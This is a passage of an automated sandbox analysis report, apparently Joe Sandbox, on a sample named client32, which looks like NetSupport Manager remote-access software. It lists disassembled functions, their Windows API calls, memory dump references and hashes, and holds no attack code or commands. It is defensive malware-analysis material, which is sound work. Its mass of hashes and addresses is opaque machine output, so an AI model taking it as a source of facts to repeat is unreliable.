                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3768737497-0
                                                                                  • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                  • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                  • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                  • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                  Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_
                                                                                  • String ID:
                                                                                  • API String ID: 3382485803-0
                                                                                  • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                  • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                  • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                  • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                  Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                  • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                  • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                  • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                  Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                  • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                  • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                  • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                  Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                    • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 328603210-0
                                                                                  • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                  • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                  • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                  • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                  Function 6FA1A082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,6FA16F16,00000000,?,6FA1D40B,00000001,6FA16F16,00000000,00000000,00000000,?,6FA16F16,00000001,00000214), ref: 6FA1A0C5
                                                                                    • Part of subcall function 6FA160F9: __getptd_noexit.LIBCMT ref: 6FA160F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 328603210-0
                                                                                  • Opcode ID: af46957bd6e6b353395cff199f2e2eb1abc6124c0e286c06a48c03490f74b7cc
                                                                                  • Instruction ID: d43dad5aadf0e8c85418d3618b4ce96c008a55c5fe0db758de6f7ec12a4768b1
                                                                                  • Opcode Fuzzy Hash: af46957bd6e6b353395cff199f2e2eb1abc6124c0e286c06a48c03490f74b7cc
                                                                                  • Instruction Fuzzy Hash: 9B01B1363093169FFB25CE35CD14B973756AF82364F1A852AEC15CF280DB7DA494C640
                                                                                  Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __waccess_s
                                                                                  • String ID:
                                                                                  • API String ID: 4272103461-0
                                                                                  • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                  • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                  • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                  • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                  Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3646066109-0
                                                                                  • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                  • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                  • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                  • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                  Function 003A1000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _NSMClient32@8.PCICL32(?,?,?,003A10A2,00000000), ref: 003A100B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3445791821.00000000003A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 003A0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3445765372.00000000003A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_3a0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Client32@8
                                                                                  • String ID:
                                                                                  • API String ID: 433899448-0
                                                                                  • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction ID: 41843f1f7e6c0762239a0be45f5ed4243b55062c1223f2cde1b52779c505cc43
                                                                                  • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction Fuzzy Hash: 2DB092B211434D9B8714EE98E841C7B339CAA98600F040809BD0547282CA61FC609671

                                                                                  Non-executed Functions

                                                                                  Function 110077A0 Relevance: 88.0, APIs: 35, Strings: 15, Instructions: 548windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                    • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                                  • SetCursor.USER32(00000000), ref: 110077F1
                                                                                  • GetDC.USER32(?), ref: 1100781D
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                  • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                  • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                    • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                    • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                    • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                  • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                  • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                  • DeleteDC.GDI32(?), ref: 110079FA
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                  • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                                  • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                  • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                  • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                  • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                    • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                    • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                    • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                    • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                    • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                    • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                    • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                    • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                    • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                    • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                    • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                    • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                    • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                    • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                    • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                    • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                    • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                  • _memset.LIBCMT ref: 11007BC7
                                                                                  • _swscanf.LIBCMT ref: 11007C34
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                  • _memset.LIBCMT ref: 11007C8C
                                                                                  • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                  • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                  • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                  • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                    • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                  • UpdateWindow.USER32(?), ref: 11007EF2
                                                                                  • SetCursor.USER32(?), ref: 11007EFF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                  • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$@Ls$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2635354838-3135201127
                                                                                  • Opcode ID: 64f7d75a4fb406181703900f776ac32f7e7884569a6b50840db75735d2bd8f7e
                                                                                  • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                  • Opcode Fuzzy Hash: 64f7d75a4fb406181703900f776ac32f7e7884569a6b50840db75735d2bd8f7e
